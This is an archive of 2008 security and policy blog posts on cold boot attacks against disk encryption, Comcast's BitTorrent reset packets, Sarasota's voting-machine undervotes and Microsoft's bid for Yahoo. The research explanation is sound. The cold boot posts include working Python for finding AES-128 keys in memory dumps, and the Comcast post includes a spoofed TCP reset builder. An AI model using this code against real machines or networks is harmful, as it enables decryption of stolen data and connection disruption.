
Archives for 2008

Cold Boot Attacks: Vulnerable While Sleeping

Our research on cold boot attacks on disk encryption has generated lots of interesting discussion. A few misconceptions seem to be floating around, though. I want to address one of them today.

As we explain in our paper, laptops are vulnerable when they are “sleeping” or (usually) “hibernating”. Frequently used laptops are almost always in these states when they’re not in active use – when you just close the lid on your laptop and it quiets down, it’s probably sleeping.

When a laptop goes to sleep, all of the data that was in memory stays there, but the rest of the system is shut down. When you re-open the lid of the laptop, the rest of the system is activated, and the system goes on running, using the same memory contents as before. (Hibernating is similar, but the contents of memory are copied off to the hard drive instead, then brought back from the hard drive when you re-awaken the machine.) People put their laptops to sleep, rather than shutting them down entirely, because a sleeping machine can wake up in seconds with all of the programs still running, while a fully shut-down machine will take minutes to reboot.

Now suppose an attacker gets hold of your laptop while it is sleeping, and suppose the laptop is using disk encryption. The attacker can take the laptop back to his lair, and then open the lid. The machine will reawaken, with the same information in memory that was there when you put the machine to sleep – and that information includes the secret key that is used to encrypt the files on your hard disk. The machine may be screen-locked – that is, it may require entry of your password before you can interact with the desktop – but the attacker won’t care. All he cares about is that the encryption key is in memory.

The attacker will then insert a special thumb drive into the laptop, yank out the laptop’s battery, quickly replace the battery, and push the power button to reboot the laptop. The encryption key will still be in memory – memory contents fade only while the machine is without power, and the battery was out only momentarily. It doesn’t matter how long the laptop takes to reboot, because memory is powered and refreshed again as soon as the battery is back in place. When the laptop boots, software from the thumb drive will read the contents of memory, find the secret encryption key, and proceed to unlock the encrypted files on your hard drive.
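
To make that last step concrete, here is a minimal sketch in Python of the kind of offline scan the thumb-drive software might do once the memory image has been dumped to a file. This is purely illustrative and is not the key-finding tools described in the paper: it simply flags windows whose bytes look nearly random, since keys and key schedules have much higher entropy than typical memory contents. The file name, window size, and threshold are assumptions.

    # Crude illustration only: flag high-entropy windows in a raw memory dump.
    # "memory.img", the window size, and the threshold are assumed values.
    import math
    from collections import Counter

    def shannon_entropy(window: bytes) -> float:
        # Empirical entropy in bits per byte, between 0 and 8.
        counts = Counter(window)
        total = len(window)
        return -sum((c / total) * math.log2(c / total) for c in counts.values())

    def flag_keylike_regions(path="memory.img", window=4096, threshold=7.5):
        with open(path, "rb") as f:
            image = f.read()
        return [off for off in range(0, len(image) - window + 1, window)
                if shannon_entropy(image[off:off + window]) >= threshold]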

In short, the adversary doesn’t need to capture your laptop while the laptop is open and in active use. All he needs is to get your laptop while it is sleeping – which it is probably doing most of the time.

New Research Result: Cold Boot Attacks on Disk Encryption

Today eight colleagues and I are releasing a significant new research result. We show that disk encryption, the standard approach to protecting sensitive data on laptops, can be defeated by relatively simple methods. We demonstrate our methods by using them to defeat three popular disk encryption products: BitLocker, which comes with Windows Vista; FileVault, which comes with Mac OS X; and dm-crypt, which is used with Linux. The research team includes J. Alex Halderman, Seth D. Schoen, Nadia Heninger, William Clarkson, William Paul, Joseph A. Calandrino, Ariel J. Feldman, Jacob Appelbaum, and Edward W. Felten.

Our site has links to the paper, an explanatory video, and other materials.

The root of the problem lies in an unexpected property of today’s DRAM memories. DRAMs are the main memory chips used to store data while the system is running. Virtually everybody, including experts, will tell you that DRAM contents are lost when you turn off the power. But this isn’t so. Our research shows that data in DRAM actually fades out gradually over a period of seconds to minutes, enabling an attacker to read the full contents of memory by cutting power and then rebooting into a malicious operating system.
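
For readers who want a concrete picture of how the decay could be measured, here is a small sketch under some assumptions: fill a region of memory with a known pattern, cut power for a measured interval, dump the same region after rebooting into a minimal environment, and count the flipped bits. The file names are placeholders; this illustrates the measurement idea, not the instrumentation described in the paper.

    # Illustrative sketch: compare a known fill pattern ("before.img") to the
    # bytes recovered after a power-off interval ("after.img") and report the
    # fraction of bits that decayed. File names are placeholders.
    def decayed_fraction(before_path="before.img", after_path="after.img"):
        with open(before_path, "rb") as f:
            before = f.read()
        with open(after_path, "rb") as f:
            after = f.read()
        n = min(len(before), len(after))
        flipped = sum(bin(a ^ b).count("1") for a, b in zip(before[:n], after[:n]))
        return flipped / (8 * n)

Repeating this for different power-off intervals traces out a decay curve for a given machine and temperature.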

Interestingly, if you cool the DRAM chips, for example by spraying inverted cans of “canned air” dusting spray on them, the chips will retain their contents for much longer. At these temperatures (around -50 °C) you can remove the chips from the computer and let them sit on the table for ten minutes or more, without appreciable loss of data. Cool the chips in liquid nitrogen (-196 °C) and they hold their state for hours at least, without any power. Just put the chips back into a machine and you can read out their contents.

This is deadly for disk encryption products because they rely on keeping master decryption keys in DRAM. This was thought to be safe because the operating system would keep any malicious programs from accessing the keys in memory, and there was no way to get rid of the operating system without cutting power to the machine, which “everybody knew” would cause the keys to be erased.

Our results show that an attacker can cut power to the computer, then power it back up and boot a malicious operating system (from, say, a thumb drive) that copies the contents of memory. Having done that, the attacker can search through the captured memory contents, find any crypto keys that might be there, and use them to start decrypting hard disk contents. We show very effective methods for finding and extracting keys from memory, even if the contents of memory have faded somewhat (i.e., even if some bits of memory were flipped during the power-off interval). If the attacker is worried that memory will fade too quickly, he can chill the DRAM chips before cutting power.
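
To give a concrete picture of the key-finding step, here is a simplified sketch for AES-128. It relies on the fact that an AES key normally sits in memory alongside its 176-byte key schedule, so for each candidate offset you can expand the first 16 bytes and check how closely the following 160 bytes match the expected schedule, tolerating some flipped bits. This is simplified relative to the tools described in the paper: it assumes the 16 key bytes themselves survived intact, and the error threshold and word-aligned search step are arbitrary assumptions.

    # Simplified sketch of searching a memory image for AES-128 key schedules.
    # Assumes the 16 key bytes are intact; the 40-bit error budget is arbitrary.

    def gmul(a, b):
        # Multiplication in GF(2^8) with the AES reduction polynomial 0x11B.
        p = 0
        for _ in range(8):
            if b & 1:
                p ^= a
            carry = a & 0x80
            a = (a << 1) & 0xFF
            if carry:
                a ^= 0x1B
            b >>= 1
        return p

    def build_sbox():
        # S-box = affine transform of the multiplicative inverse in GF(2^8).
        sbox = []
        for x in range(256):
            inv = 0 if x == 0 else next(y for y in range(1, 256) if gmul(x, y) == 1)
            out = 0
            for i in range(8):
                bit = ((inv >> i) ^ (inv >> ((i + 4) % 8)) ^ (inv >> ((i + 5) % 8)) ^
                       (inv >> ((i + 6) % 8)) ^ (inv >> ((i + 7) % 8)) ^ (0x63 >> i)) & 1
                out |= bit << i
            sbox.append(out)
        return sbox

    SBOX = build_sbox()

    def expand_key(key16):
        # Standard AES-128 key expansion: 16 key bytes -> 176 schedule bytes.
        w = list(key16)
        rcon = 0x01
        for i in range(16, 176, 4):
            t = w[i - 4:i]
            if i % 16 == 0:
                t = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]]
                rcon = gmul(rcon, 2)
            w.extend(w[i - 16 + j] ^ t[j] for j in range(4))
        return bytes(w)

    def bit_errors(a, b):
        return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

    def find_aes128_keys(image, max_errors=40):
        hits = []
        # Step by 4 on the assumption that key schedules are word-aligned.
        for off in range(0, len(image) - 176 + 1, 4):
            schedule = expand_key(image[off:off + 16])
            errs = bit_errors(schedule[16:], image[off + 16:off + 176])
            if errs <= max_errors:
                hits.append((off, image[off:off + 16], errs))
        return hits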

There seems to be no easy fix for these problems. Fundamentally, disk encryption programs now have nowhere safe to store their keys. Today’s Trusted Computing hardware does not seem to help; for example, we can defeat BitLocker despite its use of a Trusted Platform Module.

For more details, see the paper site.

Comcast's Disappointing Defense

Last week, Comcast offered a defense in the FCC proceeding challenging the technical limitations it had placed on BitTorrent traffic in its network. (Back in October, I wrote twice about Comcast’s actions.)

The key battle line is whether Comcast is just managing its network reasonably in the face of routine network congestion, as it claims, or whether it is singling out certain kinds of traffic for unnecessary discrimination, as its critics claim. The FCC process has generated lots of verbiage, which I can’t hope to discuss, or even summarize, in this post.

I do want to call out one aspect of Comcast’s filing: the flimsiness of its technical argument.

Here’s one example (pp. 14-15).

As Congresswoman Mary Bono Mack recently explained:

The service providers are watching more and more of their network monopolized by P2P bandwidth hogs who command a disproportionate amount of their network resources. . . . You might be asking yourself, why don’t the broadband service providers invest more into their networks and add more capacity? For the record, broadband service providers are investing in their networks, but simply adding more bandwidth does not solve [the P2P problem]. The reason for this is P2P applications are designed to consume as much bandwidth as is available, thus more capacity only results in more consumption.

(emphasis in original). The flaws in this argument start with the fact that the italicized claim – that P2P applications are designed to consume as much bandwidth as is available – is wrong. P2P protocols don’t aim to use more bandwidth rather than less. They’re not sparing with bandwidth, but they don’t use it for no reason, and there does come a point where they don’t want any more.

But even leaving aside the merits of the argument, what’s most remarkable here is that Comcast’s technical description of BitTorrent cites as evidence not a textbook, nor a standards document, nor a paper from the research literature, nor a paper by the designer of BitTorrent, nor a document from the BitTorrent company, nor the statement of any expert, but a speech by a member of Congress. Congressmembers know many things, but they’re not exactly the first group you would turn to for information about how network protocols work.

This is not the only odd source that Comcast cites. Later (p. 28) they claim that the forged TCP Reset packets that they send shouldn’t be called “forged”. For this proposition they cite some guy named George Ou who blogs at ZDNet. They give no reason why we should believe Mr. Ou on this point. My point isn’t to attack Mr. Ou, who for all I know might actually have some relevant expertise. My point is that if this is the most authoritative citation Comcast can find, then their argument doesn’t look very solid. (And, indeed, it seems pretty uncontroversial to call these particular packets “forged”, given that they mislead the recipient about (1) which IP address sent the packet, and (2) why the packet was sent.)
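
For readers who want to see why “forged” is the natural word here, the sketch below (using the scapy library, with placeholder addresses, ports, and sequence number) shows how a reset packet can be constructed so that its IP source field names an endpoint that never sent it. This illustrates the protocol point only; it is not a claim about the specific equipment or software Comcast used, and sending such packets requires raw-socket privileges.

    # Illustration only: a TCP reset whose source address impersonates the
    # remote peer. All addresses, ports, and the sequence number are
    # placeholders for the sketch.
    from scapy.all import IP, TCP, send

    def spoofed_reset(victim_ip, peer_ip, victim_port, peer_port, seq):
        # The IP header claims the packet came from the peer, and the RST flag
        # tells the victim's TCP stack that the peer is aborting the
        # connection, misleading the recipient on both counts the post names.
        pkt = IP(src=peer_ip, dst=victim_ip) / TCP(sport=peer_port,
                                                   dport=victim_port,
                                                   flags="R", seq=seq)
        send(pkt, verbose=False)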

Comcast is a big company with plenty of resources. It’s a bit depressing that they would file arguments like this with the FCC, an agency smart enough to tell the difference. Is this really the standard of technical argumentation in FCC proceedings?

The continuing saga of Sarasota's lost votes

At a hearing today before a subcommittee of Congress’s Committee on House Administration, the U.S. Government Accountability Office (GAO) reported on the results of their technical investigation into the exceptional undervote rate in the November 2006 election for Florida’s 13th Congressional District.

David Dill and I wrote a long paper about shortcomings in previous investigations, so I’m not going to present a detailed review of the history of this case. [Disclosure: Dill and I were both expert witnesses on behalf of Jennings and the other plaintiffs in the Jennings v. Buchanan case. In writing this blog post, I’m speaking only for myself. I do not speak on behalf of Christine Jennings or anybody else involved with the campaign.]

Heavily abridged history: One in seven votes recorded on Sarasota’s ES&S iVotronic systems in the Congressional race was blank. The margin of victory was radically smaller than this. If you do a statistical projection from the votes that were cast onto the blank votes, you inevitably end up with a different candidate seated in Congress.
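
A rough back-of-the-envelope calculation shows why. The undervote count below is the roughly 18,000 figure discussed later in this post, the certified margin is approximate, and the 53/47 split is an assumed, illustrative figure rather than the result of any particular analysis.

    # Illustrative arithmetic only; the split among intended votes is assumed.
    undervotes = 18_000          # approximate CD-13 undervotes in Sarasota
    certified_margin = 369       # approximate certified district-wide margin
    jennings_share = 0.53        # assumed split among the blank ballots

    projected_net = undervotes * (jennings_share - (1 - jennings_share))
    print(f"Projected net gain: {projected_net:.0f} votes "
          f"vs. a certified margin of {certified_margin}")
    # About 1,080 projected net votes, several times the certified margin,
    # which is why essentially any plausible projection flips the outcome.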

While I’m not a lawyer, my understanding of Florida election law is that the summary screen, displayed before the voter casts a vote, is what really matters. If the summary screen showed no vote in the race and the voter missed it before casting the ballot, then that’s tough luck for them. If, however, the proper thing was displayed on the summary screen and things went wrong afterward, then there would be a legal basis under Florida law to reverse the election.

Florida’s court system never got far enough to make this call. The judge refused to even allow the plaintiffs access to the machines in order to conduct their own investigation. Consequently, Jennings took her case directly to Congress, which has the power to seat its own members. The last time this particular mechanism was used to overturn an election was in 1985. It’s unclear exactly what standard Congress must use when making a decision like this. Should they use Florida’s standard? Should they impose their own standard? Good question.

Okay, then. On to the GAO’s report. GAO did three tests:

  1. They sampled the machines to verify that the firmware installed in them was the firmware that was supposed to be there. They also “witnessed” the source code being compiled and confirmed that it yielded the same firmware that was in use. Nothing surprising was found. (A sketch of this kind of check appears just after this list.)
  2. They cast a number of test ballots. Everything worked.
  3. They deliberately miscalibrated some iVotronic systems in a variety of different ways and cast some more test votes. They found the machines were “difficult to use”, but that the summary screens were accurate with respect to the voter’s selections.
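
As a purely illustrative picture of the kind of check described in item 1, the sketch below hashes each firmware image dumped from a sampled machine and compares it against the image built from the escrowed source code. The file layout and naming scheme are assumptions; this is not GAO’s actual procedure or tooling.

    # Illustrative sketch of firmware verification by hashing; file layout and
    # naming are assumed, and this is not GAO's actual procedure.
    import hashlib
    from pathlib import Path

    def sha256_of(path: Path) -> str:
        return hashlib.sha256(path.read_bytes()).hexdigest()

    def verify_sampled_machines(reference_image: Path, dump_dir: Path) -> None:
        expected = sha256_of(reference_image)
        for dump in sorted(dump_dir.glob("*.bin")):   # assumed naming scheme
            status = "OK" if sha256_of(dump) == expected else "MISMATCH"
            print(f"{dump.name}: {status}")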

What they didn’t do:

  • They didn’t conduct any controlled human-subjects tests in which volunteers cast simulated votes. Such a test, while difficult and expensive to perform, would allow us to quantify the extent to which voters are confused by different aspects of the voting system’s user interface.
  • They didn’t examine any of the warehoused machines for evidence of miscalibration. They speculate that grossly miscalibrated machines would have been detected in the field and would have been either recalibrated or taken out of service. They suggest that two such machines were, in fact, taken out of service.
  • They didn’t go through any of ES&S’s internal change logs or trouble tickets. If ES&S knows more, internally, about what may have caused this problem, they’re not saying and GAO was unable to learn more.
  • For the tests that they did conduct, GAO didn’t describe enough about the test setup and execution for us to make a reasonable critique of whether their test setup was done properly.

GAO’s conclusions are actually rather mild. All they’re saying is that they have some confidence that the machines in the field were running the correct software, and that the software doesn’t seem to induce failures. GAO has no opinion on whether poor human factors played a role, nor do they offer any opinion on what the legal implications of poor human factors would be in terms of who should have won the race. Absent any sort of “smoking gun” (and, yes, 18,000 undervotes apparently didn’t make quite enough smoke on their own), it would seem unlikely that the Committee on House Administration would vote to overturn the election.

Meanwhile, you can expect ES&S and others to use the GAO report as some sort of vindication of the iVotronic, in particular, or of paperless DRE voting systems, in general. Don’t buy it. Even if Sarasota’s extreme undervote rate wasn’t itself sufficient to throw out this specific election result, it still represents compelling evidence that the voting system, as a whole, substantially failed to capture the intent of Sarasota’s voters. Finally, the extreme effort invested by Sarasota County, the State of Florida, and the GAO demonstrates the fundamental problem with the current generation of paperless DRE voting systems: when problems occur, it’s exceptionally difficult to diagnose them. There simply isn’t enough information left behind to determine what really happened during the election.

Other articles on today’s news: CNet News, Bradenton Herald, Sarasota Herald-Tribune, NetworkWorld, Miami Herald (AP wire story), VoteTrustUSA

UPDATE (2/12): Ted Selker (MIT Media Lab) has a press release online that describes human factors experiments with a Flash-based mock-up of the Sarasota CD-13 ballot. They appear to have found undervote rates of comparable magnitude to those observed in Sarasota. A press release is very different from a proper technical report, much less a conference or journal publication, so it’s inappropriate to look to this press release as “proof” of any sort of “ballot blindness” effect.

Google Objects to Microhoo: Pot Calling Kettle Black?

Last week Microsoft offered to buy Yahoo at a big premium over Yahoo’s current stock price; and Google complained vehemently that Microsoft’s purchase of Yahoo would reduce competition. There’s been tons of commentary about this. Here’s mine.

The first question to ask is why Microsoft made such a high offer for Yahoo. One possibility is that Microsoft thinks the market had drastically undervalued Yahoo, making it a good investment even at a big markup. This seems unlikely.

A more plausible theory is that Microsoft thinks Yahoo is a lot more valuable when combined with Microsoft than it would be on its own. Why might this be? There are two plausible theories.

The synergy theory says that combining Yahoo’s businesses with Microsoft’s businesses creates lots of extra value; that is, the whole would be much more profitable than the parts would be separately.

The market structure theory says that Microsoft benefits from Yahoo’s presence in the market (as a counterweight to Google), and that Microsoft, worried that Yahoo’s market position was starting to slip, acted to prop up Yahoo by giving it credible access to capital and strong management. In this theory, Microsoft cares less (or not at all) about actually combining the businesses, and wants mostly to keep Google from capturing Yahoo’s market share.

My guess is that both theories have some merit – that Microsoft’s offer is both offensive (seeking synergies) and defensive (maintaining market structure).

Google objected almost immediately, arguing that a Microsoft-Yahoo merger would reduce competition so much that government should intervene to block the merger or restrict the conduct of the merged entity. The commentary on Google’s complaint has focused on two points. First, at least in some markets, two-way competition between Microhoo and Google might be more vigorous than the current three-way competition between a dominant Google and two rivals. Second, even assuming that the antitrust authorities ultimately reject Google’s argument and allow the merger to proceed, government scrutiny will delay the merger and distract Microsoft and Yahoo, thereby helping Google.

Complaining has downsides for Google too – encouraging the government to be skeptical of acquisitions by dominant high-tech companies could easily boomerang, causing antitrust headaches for Google down the road.

So why is Google complaining, despite this risk? The most intriguing possibility is that Google is working the refs. Athletes and coaches often complain to the referee about a call, knowing that the ref won’t change the call, but hoping to generate some sympathy that will pay off the next time a close call has to be made. Suppose Google complains, and the government rejects its complaint. The next time Google makes an acquisition and the government starts asking questions, Google can argue that if the government didn’t do anything about the Microhoo merger, then it should lay off Google too.

It’s fun to toss around these Machiavellian theories, but I doubt Google actually thought all this through before it reacted. Whatever the explanation, now that it has reacted, it’s stuck with the consequences of its reaction – just as Microsoft is stuck, for better or worse, with its offer to buy Yahoo.